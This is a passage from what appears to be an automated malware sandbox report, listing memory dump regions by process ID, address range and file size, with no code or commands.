                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/3932-193-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/3996-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4060-259-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4256-286-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4308-260-0x00007FF9A37F0000-0x00007FF9A39E5000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                  • memory/4308-261-0x00007FF9A1D90000-0x00007FF9A1E4E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    760KB

                                                                                                                                                                                                  • memory/4320-232-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/4320-227-0x0000000002E80000-0x0000000002E8A000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    40KB

                                                                                                                                                                                                  • memory/4320-225-0x0000000000700000-0x0000000002628000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    31.2MB

                                                                                                                                                                                                  • memory/4320-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4320-228-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/4320-226-0x0000000002E60000-0x0000000002E72000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    72KB

                                                                                                                                                                                                  • memory/4384-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4492-280-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4700-187-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/4700-169-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/4700-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4740-178-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/4740-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4740-163-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/4944-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4964-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4976-278-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4980-252-0x0000000003DB0000-0x00000000043D8000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.2MB

                                                                                                                                                                                                  • memory/4980-250-0x0000000001170000-0x00000000011A6000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    216KB

                                                                                                                                                                                                  • memory/4988-222-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/4988-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4988-206-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/4996-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5008-168-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/5008-176-0x00007FF985D50000-0x00007FF986811000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                  • memory/5008-153-0x0000000000000000-mapping.dmp